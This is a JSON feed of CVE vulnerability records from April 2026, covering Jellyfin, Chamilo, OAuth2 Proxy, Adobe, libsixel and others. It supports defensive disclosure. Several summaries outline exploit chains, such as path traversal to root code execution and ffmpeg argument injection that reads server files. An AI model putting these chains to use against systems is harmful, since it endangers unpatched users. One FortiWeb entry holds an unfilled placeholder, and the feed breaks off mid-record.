{"cves":[{"cve_id":"CVE-2026-35589","summary":"nanobot is a personal AI assistant. Versions prior to 0.1.5 contain a Cross-Site WebSocket Hijacking (CSWSH) vulnerability in the bridge's WebSocket server in bridge/src/server.ts, resulting from an incomplete remediation of CVE-2026-2577. The original fix changed the binding from 0.0.0.0 to 127.0.0.1 and added an optional BRIDGE_TOKEN parameter, but token authentication is disabled by default and the server does not validate the Origin header during the WebSocket handshake. Because browsers do not enforce the Same-Origin Policy on WebSockets unless the server explicitly denies cross-origin connections, any website visited by a user running the bridge can establish a WebSocket connection to ws://127.0.0.1:3001/ and gain full access to the bridge API. This allows an attacker to hijack the WhatsApp session, read incoming messages, steal authentication QR codes, and send messages on behalf of the user. This issue has been fixed in version 0.1.5.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/HKUDS/nanobot/releases/tag/v0.1.5","https://github.com/HKUDS/nanobot/security/advisories/GHSA-v5j3-4q66-58cf"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39387","summary":"BoidCMS is an open-source, PHP-based flat-file CMS for building simple websites and blogs, using JSON as its database. Versions prior to 2.1.3 are vulnerable to a critical Local File Inclusion (LFI) attack via the tpl parameter, which can lead to Remote Code Execution (RCE). The application fails to sanitize the tpl (template) parameter during page creation and updates. This parameter is passed directly to a require_once() statement without path validation. 
An authenticated administrator can exploit this by injecting path traversal sequences (../) into the tpl value to escape the intended theme directory and include arbitrary files — specifically, files from the server's media/ directory. When combined with the file upload functionality, this becomes a full RCE chain: an attacker can first upload a file with embedded PHP code (e.g., disguised as image data), then use the path traversal vulnerability to include that file via require_once(), executing the embedded code with web server privileges. This issue has been fixed in version 2.1.3.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/BoidCMS/BoidCMS/releases/tag/v2.1.3","https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-45xp-xw54-6cv6"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39399","summary":"NuGet Gallery is a package repository that powers nuget.org. A security vulnerability exists in the NuGetGallery backend job’s handling of .nuspec files within NuGet packages. An attacker can supply a crafted nuspec file with malicious metadata, leading to cross package metadata injection that may result in remote code execution (RCE) and/or arbitrary blob writes due to insufficient input validation. The issue is exploitable via URI fragment injection using unsanitized package identifiers, allowing an attacker to control the resolved blob path. This enables writes to arbitrary blobs within the storage container, not limited to .nupkg files, resulting in potential tampering of existing content. 
This issue has been patched in commit 0e80f87628349207cdcaf55358491f8a6f1ca276.","cvss":9.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/NuGet/NuGetGallery/commit/0e80f87628349207cdcaf55358491f8a6f1ca276","https://github.com/NuGet/NuGetGallery/security/advisories/GHSA-9r3h-v4hx-rhfr"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40688","summary":"An out-of-bounds write vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.3, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.0 through 7.4.11 may allow an attacker to execute unauthorized code or commands via <insert attack vector here>","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-127"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34454","summary":"OAuth2 Proxy is a reverse proxy that provides authentication using OAuth2 providers. A regression introduced in 7.11.0 prevents OAuth2 Proxy from clearing the session cookie when rendering the sign-in page. In deployments that rely on the sign-in page as part of their logout flow, a user may be shown the sign-in page while the existing session cookie remains valid, meaning the browser session is not actually logged out. On shared workstations or devices, a subsequent user could continue to use the previous user's authenticated session. Deployments that use a dedicated logout/sign-out endpoint to terminate sessions are not affected. 
This issue is fixed in 7.15.2","cvss":3.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v7.15.2","https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-f24x-5g9q-753f"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34457","summary":"OAuth2 Proxy is a reverse proxy that provides authentication using OAuth2 providers. Versions prior to 7.15.2 contain a configuration-dependent authentication bypass in deployments where OAuth2 Proxy is used with an auth_request-style integration (such as nginx auth_request) and either --ping-user-agent is set or --gcp-healthchecks is enabled. In affected configurations, OAuth2 Proxy treats any request with the configured health check User-Agent value as a successful health check regardless of the requested path, allowing an unauthenticated remote attacker to bypass authentication and access protected upstream resources. Deployments that do not use auth_request-style subrequests or that do not enable --ping-user-agent/--gcp-healthchecks are not affected. This issue is fixed in 7.15.2.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v7.15.2","https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-5hvv-m4w4-gf6v"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35031","summary":"Jellyfin is an open source self hosted media server. 
Versions prior to 10.11.7 contain a vulnerability chain in the subtitle upload endpoint (POST /Videos/{itemId}/Subtitles), where the Format field is not validated, allowing path traversal via the file extension and enabling arbitrary file write. This arbitrary file write can be chained into arbitrary file read via .strm files, database extraction, admin privilege escalation, and ultimately remote code execution as root via ld.so.preload. Exploitation requires an administrator account or a user that has been explicitly granted the \"Upload Subtitles\" permission. This issue has been fixed in version 10.11.7. If users are unable to upgrade immediately, they can grant non-administrator users Subtitle upload permissions to reduce attack surface.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-j2hf-x4q5-47j3"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35032","summary":"Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a vulnerability chain in the LiveTV M3U tuner endpoint (POST /LiveTv/TunerHosts), where the tuner URL is not validated, allowing local file read via non-HTTP paths and Server-Side Request Forgery (SSRF) via HTTP URLs. This is exploitable by any authenticated user because the EnableLiveTvManagement permission defaults to true for all new users. An attacker can chain these vulnerabilities by adding an M3U tuner pointing to an attacker-controlled server, serving a crafted M3U with a channel pointing to the Jellyfin database, exfiltrating the database to extract admin session tokens, and escalating to admin privileges. This issue has been fixed in version 10.11.7. 
If users are unable to upgrade immediately, they can disable Live TV Management privileges for all users.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.6,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-8fw7-f233-ffr8"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35033","summary":"Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain an unauthenticated arbitrary file read vulnerability via ffmpeg argument injection through the StreamOptions query parameter parsing mechanism. The ParseStreamOptions method in StreamingHelpers.cs adds any lowercase query parameter to a dictionary without validation, bypassing the RegularExpression attribute on the level controller parameter, and the unsanitized value is concatenated directly into the ffmpeg command line. By injecting a drawtext filter with a textfile argument, an attacker can read arbitrary server files such as /etc/shadow and exfiltrate their contents as text rendered in the video stream response. The vulnerable /Videos/{itemId}/stream endpoint has no Authorize attribute, making this exploitable without authentication, though item GUIDs are pseudorandom and require an authenticated user to obtain. 
This issue has been fixed in version 10.11.7.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-jh22-fw8w-2v9x"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35034","summary":"Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a denial of service vulnerability in the SyncPlay group creation endpoint (POST /SyncPlay/New), where an authenticated user can create groups with names of unlimited size due to insufficient input validation. By sending large payloads combined with arbitrary group IDs, an attacker can lock out the endpoint for other clients attempting to join SyncPlay groups and significantly increase the memory usage of the Jellyfin process, potentially leading to an out-of-memory crash. This issue has been fixed in version 10.11.7.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-v2jv-54xj-h76w"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27299","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to access sensitive files or data on the system. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27300","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27301","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33021","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. 
Versions 1.8.7 and prior contain a use-after-free vulnerability in sixel_encoder_encode_bytes() because sixel_frame_init() stores the caller-owned pixel buffer pointer directly in frame->pixels without making a defensive copy. When a resize operation is triggered, sixel_frame_convert_to_rgb888() unconditionally frees this caller-owned buffer and replaces it with a new internal allocation, leaving the caller with a dangling pointer. Any subsequent access to the original buffer by the caller constitutes a use-after-free, confirmed by AddressSanitizer. An attacker who controls incoming frames can trigger this bug repeatedly and predictably, resulting in a reliable crash with potential for code execution. This issue has been fixed in version 1.8.7-r1.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-j6m5-2cc7-3whc"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33023","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. In versions 1.8.7 and prior, when built with the --with-gdk-pixbuf2 option, a use-after-free vulnerability exists in load_with_gdkpixbuf() in loader.c. The cleanup path manually frees the sixel_frame_t object and its internal buffers without consulting the reference count, even though the object was created via the refcounted constructor sixel_frame_new() and exposed to the public callback. A callback that calls sixel_frame_ref(frame) to retain a logically valid reference will hold a dangling pointer after sixel_helper_load_image_file() returns, and any subsequent access to the frame or its fields triggers a use-after-free confirmed by AddressSanitizer. 
The root cause is a consistency failure between two cleanup strategies in the same codebase: sixel_frame_unref() is used in load_with_builtin() but raw free() is used in load_with_gdkpixbuf(). An attacker supplying a crafted image to any application built against libsixel with gdk-pixbuf2 support can trigger this reliably, potentially leading to information disclosure, memory corruption, or code execution. This issue has been fixed in version 1.8.7-r1.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-hr25-g2j6-qjw6"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33414","summary":"Podman is a tool for managing OCI containers and pods. Versions 4.8.0 through 5.8.1 contain a command injection vulnerability in the HyperV machine backend in pkg/machine/hyperv/stubber.go, where the VM image path is inserted into a PowerShell double-quoted string without sanitization, allowing $() subexpression injection. Because PowerShell evaluates subexpressions inside double-quoted strings before executing the outer command, an attacker who can control the VM image path through a crafted machine name or image directory can execute arbitrary PowerShell commands with the privileges of the Podman process. On typical Windows installations this means SYSTEM-level code execution, and only Windows is affected as the code is exclusive to the HyperV backend. 
This issue has been patched in version 5.8.2.","cvss":4.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/containers/podman/commit/571c842bd357ee626019ea97d030fb772fc654ed","https://github.com/containers/podman/security/advisories/GHSA-hc8w-h2mf-hp59"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27293","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27294","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27295","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27296","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27297","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27298","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27290","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Untrusted Search Path vulnerability that might allow attackers to execute arbitrary code in the context of the current user. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. 
Exploitation of this issue does not require user interaction.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27292","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39906","summary":"Unisys WebPerfect Image Suite versions 3.0.3960.22810 and 3.0.3960.22604 expose a deprecated .NET Remoting TCP channel that allows remote unauthenticated attackers to leak NTLMv2 machine-account hashes by supplying a Windows UNC path as a target file argument through object-unmarshalling techniques. 
Attackers can capture the leaked NTLMv2 hash and relay it to other hosts to achieve privilege escalation or lateral movement depending on network configuration and patch level.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.unisys.com/solutions/cai/applications/","https://www.vulncheck.com/advisories/unisys-webperfect-image-suite-ntlmv2-hash-leakage-via-net-remoting"],"published_time":"2026-04-14T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39907","summary":"Unisys WebPerfect Image Suite versions 3.0.3960.22810 and 3.0.3960.22604 expose an unauthenticated WCF SOAP endpoint on TCP port 1208 that accepts unsanitized file paths in the ReadLicense action's LFName parameter, allowing remote attackers to trigger SMB connections and leak NTLMv2 machine-account hashes. Attackers can submit crafted SOAP requests with UNC paths to force the server to initiate outbound SMB connections, exposing authentication credentials that may be relayed for privilege escalation or lateral movement within the network.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.unisys.com/solutions/cai/applications/","https://www.vulncheck.com/advisories/unisys-webperfect-image-suite-ntlmv2-hash-leakage-via-wcf-soap"],"published_time":"2026-04-14T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40291","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, an insecure direct object modification vulnerability in the PUT /api/users/{id} endpoint allows any authenticated user with ROLE_STUDENT to escalate their privileges to ROLE_ADMIN by modifying the roles field on their own user record. 
The API Platform security expression is_granted('EDIT', object) only verifies record ownership, and the roles field is included in the writable serialization group, enabling any user to set arbitrary roles such as ROLE_ADMIN. Successful exploitation grants full administrative control of the platform, including access to all courses, user data, grades, and administrative settings. This issue has been fixed in version 2.0.0-RC.3.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-7phx-w897-4c9x"],"published_time":"2026-04-14T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34212","summary":"Docmost is open-source collaborative wiki and documentation software. In versions prior to 0.71.0, improper neutralization of attachment URLs in Docmost allows a low-privileged authenticated user to store a malicious `javascript:` URL inside an attachment node in page content. When another user views the page and activates the attachment link/icon, attacker-controlled JavaScript executes in the context of the Docmost origin. Version 0.71.0 patches the issue.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-cf68-cff9-hq4w"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34213","summary":"Docmost is open-source collaborative wiki and documentation software. 
Starting in version 0.3.0 and prior to version 0.71.0, improper authorization in Docmost allows a low-privileged authenticated user to overwrite another page's attachment within the same workspace by supplying a victim `attachmentId` to `POST /api/files/upload`. This is a remote integrity issue requiring no victim interaction. Version 0.71.0 contains a patch.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-89fp-2hch-j9gp"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34370","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the notebook module contains an Insecure Direct Object Reference (IDOR) vulnerability that allows any authenticated student to read the private course notes of any other user on the platform by manipulating the notebook_id parameter in the editnote action. The application fetches the note content using only the supplied integer ID without verifying that the requesting user owns the note, and the full title and HTML body are rendered in the edit form and returned to the attacker's browser. While ownership checks exist in the write paths (updateNote() and delete_note()), they are entirely absent from the read path (get_note_information()). 
This issue has been fixed in version 2.0.0-RC.3.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fm35-2hvw-564q"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34602","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the /api/course_rel_users endpoint is vulnerable to Insecure Direct Object Reference (IDOR), allowing an authenticated attacker to modify the user parameter in the request body to enroll any arbitrary user into any course without proper authorization checks. The backend trusts the user-supplied input for the user field and performs no server-side verification that the requester owns the referenced user ID or has permission to act on behalf of other users. This enables unauthorized manipulation of user-course relationships, potentially granting unintended access to course materials, bypassing enrollment controls, and compromising platform integrity. 
This issue has been fixed in version 2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/2a9f060fa9d50fc9a92ed93af774d2619642df92","https://github.com/chamilo/chamilo-lms/commit/bd2ba34c2e74475587e38c74c90c2934e69c8779","https://github.com/chamilo/chamilo-lms/commit/c9c30cdc48afae57cd6ab012ae2eceafd351a40e","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-x373-8j9j-g5pj"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34619","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploitation of this issue does not require user interaction.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34631","summary":"InCopy versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/incopy/apsb26-33.html"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35196","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, an OS Command Injection vulnerability exists in the main/inc/ajax/gradebook.ajax.php endpoint within the export_all_certificates action, where the course code retrieved from the session variable $_SESSION['_cid'] via api_get_course_id() is concatenated directly into a shell_exec() command string without sanitization or escaping using escapeshellarg(). If an attacker can manipulate or poison their session data to inject shell metacharacters into the _cid variable, they can achieve arbitrary command execution on the underlying server. Successful exploitation grants full access to read system files and credentials, alters the application and database, or disrupts server availability. 
This issue has been fixed in version 2.0.0-RC.3.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-crc6-r6c7-44q3"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27308","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. A high-privileged attacker could exploit this vulnerability and exhaust system resources, reducing application speed. Exploitation of this issue does not require user interaction.","cvss":2.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33018","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. Versions 1.8.7 and prior contain a Use-After-Free vulnerability via the load_gif() function in fromgif.c, where a single sixel_frame_t object is reused across all frames of an animated GIF and gif_init_frame() unconditionally frees and reallocates frame->pixels between frames without consulting the object's reference count. 
